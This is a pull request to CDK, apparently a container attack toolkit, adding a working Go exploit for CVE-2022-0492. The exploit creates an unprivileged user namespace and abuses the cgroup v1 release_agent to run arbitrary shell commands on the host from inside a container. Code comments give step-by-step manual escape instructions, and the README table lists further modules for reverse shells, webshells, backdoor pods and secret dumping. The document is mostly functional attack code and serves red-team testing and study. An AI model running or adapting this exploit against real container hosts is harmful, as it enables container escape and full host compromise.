### PR TITLE
feat(exploit/abuse_unpriv_userns.go): exploit of CVE-2022-0492

### DIFF
--- a/README.md
+++ b/README.md
@@ -114,34 +114,35 @@ Run targeted exploit:
 cdk run <script-name> [options]
 ```
 
-|Tactic|Technique|CDK Exploit Name|Supported|In Thin|Doc|
-|---|---|---|---|---|---|
-|Escaping|docker-runc CVE-2019-5736|runc-pwn|✔|✔||
-|Escaping|containerd-shim CVE-2020-15257|shim-pwn|✔||[link](https://github.com/cdk-team/CDK/wiki/Exploit:-shim-pwn)|
-|Escaping|docker.sock PoC (DIND attack)|docker-sock-check|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-check)|
-|Escaping|docker.sock RCE|docker-sock-pwn|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-pwn)|
-|Escaping|Docker API(2375) RCE|docker-api-pwn|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-api-pwn)|
-|Escaping|Device Mount Escaping|mount-disk|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-disk)|
-|Escaping|LXCFS Escaping|lxcfs-rw|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-lxcfs-rw)|
-|Escaping|Cgroups Escaping|mount-cgroup|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup)|
-|Escaping|Procfs Escaping|mount-procfs|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs)|
-|Escaping|Ptrace Escaping PoC|check-ptrace|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-ptrace)|
-|Escaping|Rewrite Cgroup(devices.allow)|rewrite-cgroup-devices|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-rewrite-cgroup-devices)|
-|Escaping|Read arbitrary file from host system (CAP_DAC_READ_SEARCH)|cap-dac-read-search|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-cap-dac-read-search)|
-|Discovery|K8s Component Probe|service-probe|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-service-probe)|
-|Discovery|Dump Istio Sidecar Meta|istio-check|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-istio)|
-|Discovery|Dump K8s Pod Security Policies|k8s-psp-dump|✔||[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-psp-dump)|
-|Remote Control|Reverse Shell|reverse-shell|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-reverse-shell)|
-|Credential Access|Registry BruteForce|registry-brute|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-Container-Image-Registry-Brute)|
-|Credential Access|Access Key Scanning|ak-leakage|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-ak-leakage)|
-|Credential Access|Dump K8s Secrets|k8s-secret-dump|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-secret-dump)|
-|Credential Access|Dump K8s Config|k8s-configmap-dump|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-configmap-dump)|
-|Privilege Escalation|K8s RBAC Bypass|k8s-get-sa-token|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-get-sa-token)|
-|Persistence|Deploy WebShell|webshell-deploy|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-webshell-deploy)|
-|Persistence|Deploy Backdoor Pod|k8s-backdoor-daemonset|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-backdoor-daemonset)|
-|Persistence|Deploy Shadow K8s api-server|k8s-shadow-apiserver|✔||[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-shadow-apiserver)|
-|Persistence|K8s MITM Attack (CVE-2020-8554)|k8s-mitm-clusterip|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-k8s-mitm-clusterip)|
-|Persistence|Deploy K8s CronJob|k8s-cronjob|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-cronjob)|
+| Tactic               | Technique                                                  | CDK Exploit Name       | Supported | In Thin                                                                    | Doc                                                                                  |
+|----------------------|------------------------------------------------------------|------------------------|-----------|----------------------------------------------------------------------------|--------------------------------------------------------------------------------------|
+| Escaping             | docker-runc CVE-2019-5736                                  | runc-pwn               | ✔         | ✔                                                                          ||
+| Escaping             | containerd-shim CVE-2020-15257                             | shim-pwn               | ✔         || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-shim-pwn)             |
+| Escaping             | docker.sock PoC (DIND attack)                              | docker-sock-check      | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-check)              |
+| Escaping             | docker.sock RCE                                            | docker-sock-pwn        | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-pwn)                |
+| Escaping             | Docker API(2375) RCE                                       | docker-api-pwn         | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-api-pwn)                 |
+| Escaping             | Device Mount Escaping                                      | mount-disk             | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-disk)                     |
+| Escaping             | LXCFS Escaping                                             | lxcfs-rw               | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-lxcfs-rw)                       |
+| Escaping             | Cgroups Escaping                                           | mount-cgroup           | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup)                   |
+| Escaping             | Abuse Unprivileged User Namespace Escaping  CVE-2022-0492  | abuse-unpriv-userns    | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-abuse-unpriv-userns)            |
+| Escaping             | Procfs Escaping                                            | mount-procfs           | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs)                   |
+| Escaping             | Ptrace Escaping PoC                                        | check-ptrace           | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-ptrace)                   |
+| Escaping             | Rewrite Cgroup(devices.allow)                              | rewrite-cgroup-devices | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-rewrite-cgroup-devices)         |
+| Escaping             | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search    | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-cap-dac-read-search)            |
+| Discovery            | K8s Component Probe                                        | service-probe          | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-service-probe)                  |
+| Discovery            | Dump Istio Sidecar Meta                                    | istio-check            | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-istio)                    |
+| Discovery            | Dump K8s Pod Security Policies                             | k8s-psp-dump           | ✔         || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-psp-dump)         |
+| Remote Control       | Reverse Shell                                              | reverse-shell          | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-reverse-shell)                  |
+| Credential Access    | Registry BruteForce                                        | registry-brute         | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-Container-Image-Registry-Brute) |
+| Credential Access    | Access Key Scanning                                        | ak-leakage             | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-ak-leakage)                     |
+| Credential Access    | Dump K8s Secrets                                           | k8s-secret-dump        | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-secret-dump)                |
+| Credential Access    | Dump K8s Config                                            | k8s-configmap-dump     | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-configmap-dump)             |
+| Privilege Escalation | K8s RBAC Bypass                                            | k8s-get-sa-token       | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-get-sa-token)               |
+| Persistence          | Deploy WebShell                                            | webshell-deploy        | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-webshell-deploy)                |
+| Persistence          | Deploy Backdoor Pod                                        | k8s-backdoor-daemonset | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-backdoor-daemonset)         |
+| Persistence          | Deploy Shadow K8s api-server                               | k8s-shadow-apiserver   | ✔         || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-shadow-apiserver) |
+| Persistence          | K8s MITM Attack (CVE-2020-8554)                            | k8s-mitm-clusterip     | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Evaluate:-k8s-mitm-clusterip)            |
+| Persistence          | Deploy K8s CronJob                                         | k8s-cronjob            | ✔         | ✔                                                                          | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-cronjob)                    |
 
 **Note about Thin:** The **thin release** is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.
 

--- a/pkg/exploit/abuse_unpriv_userns.go
+++ b/pkg/exploit/abuse_unpriv_userns.go
@@ -27,6 +27,7 @@ import (
 	"github.com/cdk-team/CDK/pkg/cli"
 	"github.com/cdk-team/CDK/pkg/errors"
 	"github.com/cdk-team/CDK/pkg/plugin"
+	"github.com/cdk-team/CDK/pkg/util"
 	"golang.org/x/sys/unix"
 	"io/ioutil"
 	"log"
@@ -67,6 +68,14 @@ import (
 // - check result.
 
 func UnprivUserNS(cmd string) error {
+	// check cgroup version
+	cgVer, err := util.GetCgroupVersion()
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "cannot determine cgroup version"}
+	}
+	if cgVer != 1 {
+		return &errors.CDKRuntimeError{Err: nil, CustomMsg: "exploit only suitable for cgroup v1"}
+	}
 
 	// check prerequisites
 	data, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone")
@@ -93,7 +102,26 @@ func UnprivUserNS(cmd string) error {
 		}
 	}
 
-	reExecCmd := exec.Command(curExePath, "run", "mount-cgroup", cmd, "rdma")
+	// by default, use "rdma" for kernel 4.x - 5.13, tested on 4.19/5.16
+	// for 5.13+, use "misc"
+	// But more precisely, check if any root cgroup is preferred.
+	exploitSubSys := ""
+	availSubSyses, err := util.GetAllCGroup()
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "cannot get cgroup info"}
+	}
+	for _, v := range availSubSyses {
+		if v.CgroupPath == "/" {
+			exploitSubSys = v.ControllerLst
+			break
+		}
+	}
+	if len(exploitSubSys) == 0 {
+		return &errors.CDKRuntimeError{Err: nil, CustomMsg: "cannot find suitable subsystem for exploit"}
+	}
+
+	// start actual exploit
+	reExecCmd := exec.Command(curExePath, "run", "mount-cgroup", cmd, exploitSubSys)
 	// same way as call unshare
 	reExecCmd.SysProcAttr = &syscall.SysProcAttr{
 		Unshareflags: unix.CLONE_NEWUSER | unix.CLONE_NEWNS | unix.CLONE_NEWCGROUP,

--- a/pkg/exploit/abuse_unpriv_userns.go
+++ b/pkg/exploit/abuse_unpriv_userns.go
@@ -1,0 +1,179 @@
+//go:build !no_abuse_unpriv_userns && linux
+// +build !no_abuse_unpriv_userns,linux
+
+package exploit
+
+//
+// CDK - pkg/exploit/abuse_unpriv_userns.go
+// Copyright (C) 2022 kmahyyg & CDK Team
+//
+// This program is free software; you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation; either version 2 of the License, or (at
+// your option) any later version.
+//
+// This program is distributed in the hope that it will be useful, but
+// WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+// General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program; if not, write to the Free Software
+// Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+// USA.
+//
+
+import (
+	"github.com/cdk-team/CDK/pkg/cli"
+	"github.com/cdk-team/CDK/pkg/errors"
+	"github.com/cdk-team/CDK/pkg/plugin"
+	"golang.org/x/sys/unix"
+	"io/ioutil"
+	"log"
+	"os"
+	"os/exec"
+	"strings"
+	"syscall"
+)
+
+// reference:
+// https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
+// https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/
+// https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492/blob/main/can-ctr-escape-cve-2022-0492.sh
+
+// tested in ubuntu docker, only usable in cgroup v1 containers
+// [host] sysctl -w kernel.unprivileged_userns_clone=1
+// [host] docker run -v /root/cdk:/cdk --rm -it --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu bash
+// [inside container] ./cdk run abuse-unpriv-newns "touch /hacked"
+
+// manual exploit:
+// - set host `sysctl -w kernel.unprivileged_userns_clone=1`, which is default after linux 5.10 for most distros
+// - run a container with `--security-opt seccomp=unconfined --security-opt apparmor=unconfined` using docker, make sure the user inside container is root.
+//   apparmor should also be disabled.
+// - check `/etc/mtab` for host_path: ` export host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` `
+// - check `/proc/self/cgroup` for cgroup, select one under root, since release_agent is writable only in root cgroup.
+//   hence, the only available cgroup is RDMA
+// - create mountpoint `mkdir -p /mnt/cgrp1`
+// - create new namespace `unshare -UrmC bash`
+// - mount to corresponding path `mount -t cgroup -o rdma cgroup /mnt/cgrp1`
+// - create subtasks cgroup `mkdir -p /mnt/cgrp1/x`
+// - set notify_on_release to 1 `echo 1 > /mnt/cgrp1/x/notify_on_release`
+// - set release_agent to `${host_path}/exp.sh` `echo ${host_path}/exp.sh > /mnt/cgrp1/release_agent`
+// - write exploit code to /exp.sh in container
+// - run `chmod +x /exp.sh`
+// - create new process, add to new corresponding namespace, then exit.
+//   sh -c "echo \$\$ > /mnt/cgrp1/x/cgroup.procs"
+// - RDMA sub-cgroup will be released.
+// - check result.
+
+func UnprivUserNS(cmd string) error {
+
+	// check prerequisites
+	data, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone")
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "check prerequisites error."}
+	}
+
+	if strings.TrimSuffix(string(data), "\n") != "1" {
+		return &errors.CDKRuntimeError{Err: nil, CustomMsg: "host os does NOT enable unprivileged user namespace."}
+	}
+	// prerequisites satisfied, move current process in new user namespace
+	// https://elixir.bootlin.com/linux/v5.16.13/source/kernel/fork.c#L2957
+	// unshare can only be used in single-thread program. Golang program is always multi-thread.
+	// related golang issue:
+	// https://github.com/golang/go/issues/22283
+	// https://github.com/golang/go/issues/12125 (not resolved yet)
+	// more specifically: https://github.com/golang/go/issues/50098
+	// golang contributor think that there's no possible solution until now (2022-3).
+	curExePath, err := os.Executable()
+	if err != nil {
+		return &errors.CDKRuntimeError{
+			Err:       err,
+			CustomMsg: "cannot get current executable path",
+		}
+	}
+
+	reExecCmd := exec.Command(curExePath, "run", "mount-cgroup", cmd, "rdma")
+	// same way as call unshare
+	reExecCmd.SysProcAttr = &syscall.SysProcAttr{
+		Unshareflags: unix.CLONE_NEWUSER | unix.CLONE_NEWNS | unix.CLONE_NEWCGROUP,
+		UidMappings: []syscall.SysProcIDMap{
+			{ContainerID: 0, HostID: syscall.Geteuid(), Size: 1},
+		},
+		GidMappings: []syscall.SysProcIDMap{
+			{ContainerID: 0, HostID: syscall.Getegid(), Size: 1},
+		},
+		GidMappingsEnableSetgroups: false,
+		//  +  In the case of gid_map, use of the setgroups(2) system
+		//     call must first be denied by writing "deny" to the
+		//     /proc/[pid]/setgroups file (see below) before writing to
+		//     gid_map.
+		// https://man7.org/linux/man-pages/man7/user_namespaces.7.html
+		// If this is not working, we have to let this process sleep and
+		// get its PID, then manually execute the following commented code.
+	}
+	// redirect output to current tty
+	reExecCmd.Stdout = os.Stdout
+	reExecCmd.Stderr = os.Stderr
+
+	//// call unshare then execute
+	//// get current userid,groupid for mapping
+	//uidMapStr := fmt.Sprintf("0 %d 1", os.Geteuid())
+	//gidMapStr := fmt.Sprintf("0 %d 1", os.Getegid())
+	//// reason above, strace `unshare` tell you to do that.
+	//err = ioutil.WriteFile(fmt.Sprintf("/proc/%d/setgroups", reExecCmd.Process.Pid), []byte("deny"), 0644)
+	//if err != nil {
+	//	return &errors.CDKRuntimeError{
+	//		Err:       err,
+	//		CustomMsg: "gid_map setgroups failed",
+	//	}
+	//}
+	//// set uid and gid mapping, so you have all the caps required in new namespace to mount.
+	//err = ioutil.WriteFile(fmt.Sprintf("/proc/%d/uid_map", reExecCmd.Process.Pid), []byte(uidMapStr), 0644)
+	//if err != nil {
+	//	return &errors.CDKRuntimeError{
+	//		Err:       err,
+	//		CustomMsg: "set uid_map failed",
+	//	}
+	//}
+	//err = ioutil.WriteFile(fmt.Sprintf("/proc/%d/gid_map", reExecCmd.Process.Pid), []byte(gidMapStr), 0644)
+	//if err != nil {
+	//	return &errors.CDKRuntimeError{
+	//		Err:       err,
+	//		CustomMsg: "set gid_map failed",
+	//	}
+	//}
+	//// then execute mount-cgroup exploit with rdma subsystem
+
+	err = reExecCmd.Run()
+	return err
+}
+
+// exploit interface implementation
+
+type ExploitUnprivUserNS struct{}
+
+func (exp ExploitUnprivUserNS) Desc() string {
+	return "abuse mount-cgroup co-operating with unprivileged user namespace creation. usage: ./cdk run abuse-unpriv-userns \"shell-cmd-payloads\""
+}
+
+func (exp ExploitUnprivUserNS) Run() bool {
+	args := cli.Args["<args>"].([]string)
+	if len(args) != 1 {
+		log.Println("Invalid Input Args.")
+		log.Fatal(exp.Desc())
+	}
+	cmd := args[0]
+	log.Printf("User-Defined Shell Payload: %s \n", cmd)
+	err := UnprivUserNS(cmd)
+	if err != nil {
+		log.Println(err)
+		return false
+	}
+	return true
+}
+
+func init() {
+	exploit := ExploitUnprivUserNS{}
+	plugin.RegisterExploit("abuse-unpriv-userns", exploit)
+}

--- a/pkg/exploit/mount_cgroup.go
+++ b/pkg/exploit/mount_cgroup.go
@@ -160,13 +160,25 @@ func (p ExploitCgroupS) Desc() string {
 }
 func (p ExploitCgroupS) Run() bool {
 	args := cli.Args["<args>"].([]string)
-	if len(args) != 1 {
+
+	cmd := args[0]
+	if len(args) == 1 {
+		// by default, use memory cgroup.
+		args = append(args, "memory")
+	}
+
+	// modified due to limitation of `unshare` syscall in linux
+	// check comments of abuse_unpriv_userns.go for more details
+	subSysName := args[1]
+	// cve-2022-0942: only RDMA is available for exploit
+	if subSysName != "memory" && subSysName != "rdma" {
 		log.Println("Invalid input args.")
 		log.Fatal(p.Desc())
 	}
-	cmd := args[0]
-	log.Printf("user-defined shell payload is: %s\n", cmd)
-	err := EscapeCgroup(cmd, "memory")
+
+	log.Printf("current cgroup for exploit: %s \n", subSysName)
+	log.Printf("user-defined shell payload is: %s \n", cmd)
+	err := EscapeCgroup(cmd, subSysName)
 	if err != nil {
 		log.Println(err)
 		return false

--- a/pkg/exploit/mount_cgroup.go
+++ b/pkg/exploit/mount_cgroup.go
@@ -57,6 +57,15 @@ func generateShellExp(hostPath, shellCmd string) (string, string) {
 }
 
 func EscapeCgroup(cmd string, subSystemName string) error {
+	// check cgroup version
+	cgVer, err := util.GetCgroupVersion()
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "cannot determine cgroup version"}
+	}
+	if cgVer != 1 {
+		return &errors.CDKRuntimeError{Err: nil, CustomMsg: "exploit only suitable for cgroup v1"}
+	}
+
 	// hostPath for write release_agent path
 	var hostPath string
 	// read /proc/self/mountinfo instead of /etc/mtab, since former one is already implemented
@@ -170,15 +179,21 @@ func (p ExploitCgroupS) Run() bool {
 	// modified due to limitation of `unshare` syscall in linux
 	// check comments of abuse_unpriv_userns.go for more details
 	subSysName := args[1]
-	// cve-2022-0942: only RDMA is available for exploit
-	if subSysName != "memory" && subSysName != "rdma" {
-		log.Println("Invalid input args.")
+	// cve-2022-0492: only RDMA/MISC is available for exploit
+	// differing of Linux Kernel version, 5.13+ has misc available, and RDMA not work.
+	availSubSys, err := util.GetAllCGroupSubSystem()
+	if err != nil {
+		log.Fatal(err.Error())
+	}
+	if !util.ContainsStrInSlice(subSysName, availSubSys) {
+		log.Println("Invalid input args. (subsystem OR cmd not quoted)")
 		log.Fatal(p.Desc())
 	}
 
+	// start exploit
 	log.Printf("current cgroup for exploit: %s \n", subSysName)
 	log.Printf("user-defined shell payload is: %s \n", cmd)
-	err := EscapeCgroup(cmd, subSysName)
+	err = EscapeCgroup(cmd, subSysName)
 	if err != nil {
 		log.Println(err)
 		return false

--- a/pkg/util/common.go
+++ b/pkg/util/common.go
@@ -34,6 +34,16 @@ func ByteToString(orig []byte) string {
 	return string(orig[l:n])
 }
 
+func ContainsStrInSlice(elem string, sli []string) bool {
+	// grabbed from https://stackoverflow.com/questions/10485743/contains-method-for-a-slice
+	for _, a := range sli {
+		if a == elem {
+			return true
+		}
+	}
+	return false
+}
+
 func RandString(n int) string {
 	// grabbed from https://stackoverflow.com/questions/22892120/how-to-generate-a-random-string-of-a-fixed-length-in-go
 	const (


### PR DESCRIPTION
co-operate with PR #40.

Use `reexec` technique to let a multi-thread program (such as this golang program) runs in a different new namespace.

Why `reexec`?

`unshare()` is not possible to use safely in multi-thread program, especially current circumstance. Check comments in code for more details.

Signed-off-by: kmahyyg <16604643+kmahyyg@users.noreply.github.com>